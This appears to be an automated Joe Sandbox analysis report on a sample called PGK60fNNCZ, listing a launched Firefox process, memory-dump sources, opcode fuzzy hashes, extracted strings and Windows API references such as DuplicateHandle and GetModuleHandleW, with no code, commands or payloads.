                                                          Has exited:false

                                                          Target ID:14
                                                          Start time:23:56:53
                                                          Start date:10/01/2025
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff722870000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true


                                                            Execution Graph

                                                            Execution Coverage:8.2%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:97
                                                            Total number of Limit Nodes:3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 269c1cb2e8fb1fb540195ab6faee8d51722cfb0cddf3a3b50d61fdd92122879f
                                                            • Instruction ID: c1bf58596624f8626fe7e76c550114645499979e7c6c784a8574e954c6e0b0cb
                                                            • Opcode Fuzzy Hash: 269c1cb2e8fb1fb540195ab6faee8d51722cfb0cddf3a3b50d61fdd92122879f
                                                            • Instruction Fuzzy Hash: 9A2126B1D056189BEB18CFA6D9453DEBEF7AFC8300F04C16AD409B62A4DB7409498FA0

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8q$8q$$q$$q$$q$$q
                                                            • API String ID: 0-1437537081
                                                            • Opcode ID: ca687355acb2b98c324fe8b6afe53c2176b33a6bcb622ed2d0afa8f2e45131b6
                                                            • Instruction ID: 8bdc391fd492a90114f1a3a1176eb49a614285d0fcc2c90f97527a125653c0f0
                                                            • Opcode Fuzzy Hash: ca687355acb2b98c324fe8b6afe53c2176b33a6bcb622ed2d0afa8f2e45131b6
                                                            • Instruction Fuzzy Hash: E441E130B04205DFF7148B68DA49BBEBBB6BF85305F15486AE405AB391E6B58C41CB92

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LRq$LRq$$q$$q$$q
                                                            • API String ID: 0-947498194
                                                            • Opcode ID: ebf55405466272794edc2076714adfc2a74f396db1b104107bfc867e2fbc205a
                                                            • Instruction ID: 460693f07e31f55146565fa0eb310bdcee8b847a8e2c76021d89785df5e22883
                                                            • Opcode Fuzzy Hash: ebf55405466272794edc2076714adfc2a74f396db1b104107bfc867e2fbc205a
                                                            • Instruction Fuzzy Hash: 6741C330B14209DFFB149B69E981BBE77B7FB44701F16452AF502D7381E6F488418B96

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LRq$$q$$q
                                                            • API String ID: 0-167464460
                                                            • Opcode ID: 5e060b1b365b9154450ec687ae7ebb9d43bc25634b15847625b9553559f0b8ce
                                                            • Instruction ID: 50ed1a077e821e0333f17f958fefaa54f32c0322a43e8b26028017b965e18d15
                                                            • Opcode Fuzzy Hash: 5e060b1b365b9154450ec687ae7ebb9d43bc25634b15847625b9553559f0b8ce
                                                            • Instruction Fuzzy Hash: 6941D231B14208DBFB109E69EA81BFE77B7FB44701F06852AF506E7391E6F488408B56

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1327014268.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_27c0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: d7fb5a109d465c17f939a5f065db3634a71dd26bdb291ca51c4e2a5ff2147dba
                                                            • Instruction ID: 76ca71d632a158cd35360e15b7378610ea5973f822f87005baf7da0ee0955760
                                                            • Opcode Fuzzy Hash: d7fb5a109d465c17f939a5f065db3634a71dd26bdb291ca51c4e2a5ff2147dba
                                                            • Instruction Fuzzy Hash: 63713270A00B098FD724DF2AD45579ABBF2FF88304F108A2DD48AD7A50DB34E846CB91

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 857 27cb440-27cd044 DuplicateHandle 859 27cd04d-27cd06a 857->859 860 27cd046-27cd04c 857->860 860->859
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,027CCF76,?,?,?,?,?), ref: 027CD037
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1327014268.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_27c0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: ca3f8c0d44376f293b482a3de0746c02166617c8e12c6790bef78722b3948022
                                                            • Instruction ID: 4e1b01ce2f217c2ceb52fa57880b2ced48f935c314a6621c4b141b2394f644fe
                                                            • Opcode Fuzzy Hash: ca3f8c0d44376f293b482a3de0746c02166617c8e12c6790bef78722b3948022
                                                            • Instruction Fuzzy Hash: 4421E7B5D002489FDB10CFAAD984ADEBBF5EB48310F14801AE918A7350D379A945CFA4

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 863 27ccfa9-27cd044 DuplicateHandle 864 27cd04d-27cd06a 863->864 865 27cd046-27cd04c 863->865 865->864
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,027CCF76,?,?,?,?,?), ref: 027CD037
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1327014268.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_27c0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 523d63b4a2e6ff5bcde2ced072bc74adc41a9270cb9585b17cdec3e648c4a7bb
                                                            • Instruction ID: b02c87feec866af1bb6517c67caa4142c609f5f3b017c206b22075c7411453c7
                                                            • Opcode Fuzzy Hash: 523d63b4a2e6ff5bcde2ced072bc74adc41a9270cb9585b17cdec3e648c4a7bb
                                                            • Instruction Fuzzy Hash: C721E3B5D00209DFDB10CFAAD584ADEBBF5FB48320F14802AE918A3250D378A945CF60

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 868 27c91b8-27c9214 870 27c9216-27c923e KiUserCallbackDispatcher 868->870 871 27c9262-27c927b 868->871 872 27c9247-27c925b 870->872 873 27c9240-27c9246 870->873 872->871 873->872
                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 027C922D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1327014268.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_27c0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: CallbackDispatcherUser
                                                            • String ID:
                                                            • API String ID: 2492992576-0
                                                            • Opcode ID: 6a9914b1b15deb4eab179f74fc6c34949769818b70357ce6b4cb2253217bc90e
                                                            • Instruction ID: 9f4eaf9bfadd43ac7cb194e0bff666d971496bbc0ff45ae8841f2e8a1c6af7d4
                                                            • Opcode Fuzzy Hash: 6a9914b1b15deb4eab179f74fc6c34949769818b70357ce6b4cb2253217bc90e
                                                            • Instruction Fuzzy Hash: EF1189B9904398CEEB15CF65D5043EABBF4EB04314F54849EC188A3286C33DAA09CB65

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 875 27c8974-27ca8f8 877 27ca8fa-27ca8fd 875->877 878 27ca900-27ca92b GetModuleHandleW 875->878 877->878 879 27ca92d-27ca933 878->879 880 27ca934-27ca948 878->880 879->880
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,027CA6E4), ref: 027CA91E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1327014268.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_27c0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 9b347dd462feb67d36ca9b842db272faa34d444392734a9c69d004b8c0e72c06
                                                            • Instruction ID: 3ca846567579301021778cec5dfbcdfc266d6b115be1ed3bc4cb8d0987225f77
                                                            • Opcode Fuzzy Hash: 9b347dd462feb67d36ca9b842db272faa34d444392734a9c69d004b8c0e72c06
                                                            • Instruction Fuzzy Hash: 7411F3B5D007498BDB24DF9AD845A9EFBF4EB88315F11842ED819A7200C379A545CFA1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 882 27c91c8-27c9214 884 27c9216-27c923e KiUserCallbackDispatcher 882->884 885 27c9262-27c927b 882->885 886 27c9247-27c925b 884->886 887 27c9240-27c9246 884->887 886->885 887->886
                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 027C922D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1327014268.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_27c0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: CallbackDispatcherUser
                                                            • String ID:
                                                            • API String ID: 2492992576-0
                                                            • Opcode ID: 70c5782fc97f69d6237dc50e7a069304e223d4c0b24c686c36910dbbad4c9438
                                                            • Instruction ID: 445105d0d6297b4de5f66ea756bd42af34d2e299e2831e7284659695c29d8357
                                                            • Opcode Fuzzy Hash: 70c5782fc97f69d6237dc50e7a069304e223d4c0b24c686c36910dbbad4c9438
                                                            • Instruction Fuzzy Hash: E5119DB5804398CEEB14CFA5D5047EEBFF4EB05314F54809DD598A3241C37DAA04CBA5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 889 59b48a8-59b4910 894 59b4917-59b491d 889->894 917 59b4920 call 59b4ae8 894->917 918 59b4920 call 59b8288 894->918 919 59b4920 call 59b4aae 894->919 920 59b4920 call 59b4d13 894->920 921 59b4920 call 59b82b1 894->921 922 59b4920 call 59b7c10 894->922 923 59b4920 call 59b4eb0 894->923 924 59b4920 call 59b5e07 894->924 895 59b4926-59b4a9f call 59b46bc 917->895 918->895 919->895 920->895 921->895 922->895 923->895 924->895
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %*&/)(#$^@!~-_
                                                            • API String ID: 0-3325533558
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %*&/)(#$^@!~-_
                                                            • API String ID: 0-3325533558
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: r
                                                            • API String ID: 0-1812594589
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Teq
                                                            • API String ID: 0-1098410595
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Teq
                                                            • API String ID: 0-1098410595
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8q
                                                            • API String ID: 0-4083045702
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: j
                                                            • API String ID: 0-2137352139
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Teq
                                                            • API String ID: 0-1098410595
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $q
                                                            • API String ID: 0-1301096350
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 62e84efbea6f157c5637badefc58f4a7f5e55eb8e2bcdb5a59c54fc500b83567
                                                            • Instruction ID: e0045bedeabc758c7c5db0a55795b8e99aa58e98db867bd9b693927e5e66b7b8
                                                            • Opcode Fuzzy Hash: 62e84efbea6f157c5637badefc58f4a7f5e55eb8e2bcdb5a59c54fc500b83567
                                                            • Instruction Fuzzy Hash: 8531E671B00224CFFB148B78D9286AD77FBFB84615B1485AAE40AC7346DB75CC01CB55
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e108f493327ca52246f04442f0d09ab65c6320accd5120cb91eaf9179c87c18e
                                                            • Instruction ID: 5e4db7611cf7bd58c2700880af8161978d20c918e8911ce7646afbd243ebae0f
                                                            • Opcode Fuzzy Hash: e108f493327ca52246f04442f0d09ab65c6320accd5120cb91eaf9179c87c18e
                                                            • Instruction Fuzzy Hash: A3314972900208AFDF14DFA9D845ADEBFF9EB48310F10842AE509E7350D775A955CFA0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 770d0adb3afe20679483b13132d9a96f6850df31c9085f2316d28d6b431a37f2
                                                            • Instruction ID: 7653c3062a12cc4827cedf23cdf1e0fa7ecd537a50a2f5b11e0210a765fd411c
                                                            • Opcode Fuzzy Hash: 770d0adb3afe20679483b13132d9a96f6850df31c9085f2316d28d6b431a37f2
                                                            • Instruction Fuzzy Hash: 93318570A08625DFF7508BB8CA006FAB7B9FB84354F148A2AA466C7281E2B4D950CB51
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 612fb768be342fa3e227b3614adc376ad63acc62002586fb7fb3ef4d864b2dfc
                                                            • Instruction ID: 3381256c15d84bfe881769af32589e2742865435486f079fc4057f7372ca0067
                                                            • Opcode Fuzzy Hash: 612fb768be342fa3e227b3614adc376ad63acc62002586fb7fb3ef4d864b2dfc
                                                            • Instruction Fuzzy Hash: E4319C71E04516CAF704EFAAD9402FEBBBAFB48700F044637E56597280D3759991CB92
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d94758ce5cb03ac64bc5b7840d92f5294047aba7ec1bc1ccf7f2e22544d17891
                                                            • Instruction ID: e9fbe09cf66973b4b0dfc01deaac6c9b1d5c6ae7a0e39e8b50385adc2605a252
                                                            • Opcode Fuzzy Hash: d94758ce5cb03ac64bc5b7840d92f5294047aba7ec1bc1ccf7f2e22544d17891
                                                            • Instruction Fuzzy Hash: 622106307683189FF71487259A06BE937BBBFC6740F28C46AE6078B395CEB098418755
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e424a026d74556ccf2cb67c97d83419b0fce86354ce6c7ee1d0ce7c600fd95fb
                                                            • Instruction ID: c1df840f20bcb859342fda08f2b05bb201261b631e52cd9f536c4913e95f73ac
                                                            • Opcode Fuzzy Hash: e424a026d74556ccf2cb67c97d83419b0fce86354ce6c7ee1d0ce7c600fd95fb
                                                            • Instruction Fuzzy Hash: 8731EE70E08516CBF700EFA9C9402FEBBBAFB49200F044667E555E7281D3798942CB91
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5f5cef07ad0fa3743a8c7a9a98658af5c09dba25ba6a7f7c052b77a915a29330
                                                            • Instruction ID: 5f0a148cad7585eabf5d7f49c39ce47c0754eadb5362a1ab0e75e79790df6e70
                                                            • Opcode Fuzzy Hash: 5f5cef07ad0fa3743a8c7a9a98658af5c09dba25ba6a7f7c052b77a915a29330
                                                            • Instruction Fuzzy Hash: 01214670768210DFF3248A24CA46BF577BBFBD6740F19C16AE7068B295C7B088018752
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 16596a3a677ab2ae6cecbc32bfce855721224b92fd86588e58a80f30df768600
                                                            • Instruction ID: 39fd96c453aa84f90df1a5ed7c215f12c50d78fe67aab754a5ae776409b334ab
                                                            • Opcode Fuzzy Hash: 16596a3a677ab2ae6cecbc32bfce855721224b92fd86588e58a80f30df768600
                                                            • Instruction Fuzzy Hash: 71213E35F006198FEF01EB68D5586EEB7F5FF88310F00456AE919E7250EB709945CB92
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1326519832.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ccd000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dda443e2f7d21f6e55b662952e657000cb1f80a84932381473455db209d104d3
                                                            • Instruction ID: 675e147defee41f0515234d31da3e8e560fe57b51dbc30c89e705d0959d81f2d
                                                            • Opcode Fuzzy Hash: dda443e2f7d21f6e55b662952e657000cb1f80a84932381473455db209d104d3
                                                            • Instruction Fuzzy Hash: 0C210371504240DFDB18DF10D9C0F16BB65FB94324F24C57DEA0A0B656C336E856CBA2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1326595034.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cdd000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0187ac22bbbde21e5052d1c37abd01bfc3e3d52131349e5261ce32b00f8bec71
                                                            • Instruction ID: e6bddc9d7781a67f47a6a38fb6f83ee67ac6cad75d639c077b8fdb0a3d1f4899
                                                            • Opcode Fuzzy Hash: 0187ac22bbbde21e5052d1c37abd01bfc3e3d52131349e5261ce32b00f8bec71
                                                            • Instruction Fuzzy Hash: 1421F575A04300DFDB14DF14D9C4B16BB65EBC4314F24C56EDA4A4B386C336E847CA62
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1326595034.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cdd000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2950a0c80a9ebdd1a07f6d14c7966056a6bb18b8ca190f28ed9fc0ce45ddaabc
                                                            • Instruction ID: 383a2474c6cd09a299b97f9c61ee54d862bb32d3e5c671f47efa9524e6b30c9c
                                                            • Opcode Fuzzy Hash: 2950a0c80a9ebdd1a07f6d14c7966056a6bb18b8ca190f28ed9fc0ce45ddaabc
                                                            • Instruction Fuzzy Hash: BF210471A04300EFDB15DF10D9C0B26BBA5FB84314F20C6AEEA4A4B392C336DC46CA61
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b2543322ab08263a45c7f93def19b16d0e9095c2932fbfd74f9f5d43f44ea5ce
                                                            • Instruction ID: 52812ac10ed5c9cca12b5963a561018f7f0142ff85422708e5eb2c6f77b2efe2
                                                            • Opcode Fuzzy Hash: b2543322ab08263a45c7f93def19b16d0e9095c2932fbfd74f9f5d43f44ea5ce
                                                            • Instruction Fuzzy Hash: 8C211075B002099FDF04EF69C8849EEF7B9FF893007518569D906A7351EB70A945CBA0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b75e16d845fe6fbfa39f08eaacffe3ce29c508db76ef8bd43e9600f9aa58e700
                                                            • Instruction ID: 43ca110c8686ac9a61a8a7349bf27b00195079dfbc94f795dcbc1c1d1fbf4639
                                                            • Opcode Fuzzy Hash: b75e16d845fe6fbfa39f08eaacffe3ce29c508db76ef8bd43e9600f9aa58e700
                                                            • Instruction Fuzzy Hash: 982115B5D013099FEB10CF9AD984ADEBBF4FB48310F14842EE459A7240D775A944CBA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bc62d1cbfa76125296dff5d19b5d1f3adb62fd321de17931b364fbe7f383f58e
                                                            • Instruction ID: dfcd0e5bacc2f05abb5da03a6aeef61d1986a9f0a44d33262a17828fecd6fc44
                                                            • Opcode Fuzzy Hash: bc62d1cbfa76125296dff5d19b5d1f3adb62fd321de17931b364fbe7f383f58e
                                                            • Instruction Fuzzy Hash: FB215175B002059FDF04EF69D8849EEBBB5FF882007104579E906E7351EB70AD45CBA0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 22c85d5e4831a255439197b0c2ae72cb4812cd2f7a75f3dad39ab458b3803539
                                                            • Instruction ID: 62aa6ce46e3c98b83a1c6bbd590e781d11a9d7dd45e616dfa720a8d639e9ed93
                                                            • Opcode Fuzzy Hash: 22c85d5e4831a255439197b0c2ae72cb4812cd2f7a75f3dad39ab458b3803539
                                                            • Instruction Fuzzy Hash: 8121C3B5D013099FEB10CF9AD984ADEBBF4FB48310F14842EE559A7200D775A944CBA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6b73b4bf2e0f8edc23779e032b0cfb1a857969d9f617d7188b0e6291170407f2
                                                            • Instruction ID: 21d44b071c6c8ab1c7c2ee9c9650e8da864e4ada774db8a5f6cf841fdf7e1e3e
                                                            • Opcode Fuzzy Hash: 6b73b4bf2e0f8edc23779e032b0cfb1a857969d9f617d7188b0e6291170407f2
                                                            • Instruction Fuzzy Hash: 8121D4B5D013099FEB10CF9AD984ADEFBF8FB48310F24842EE419A7200C775A945CBA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
